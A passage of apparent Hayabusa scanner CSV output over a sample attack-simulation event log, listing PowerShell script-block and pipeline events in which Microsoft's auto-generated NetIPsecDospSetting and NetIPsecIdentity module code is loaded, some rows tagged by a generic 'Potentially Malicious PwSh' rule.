$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = 
${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_valu,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious 
PwSh,"e; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings 
= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"e; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = 
${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw 
} } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.445 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.449 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.450 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.450 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.451 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.452 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify 
System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.462 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.462 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 
[Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 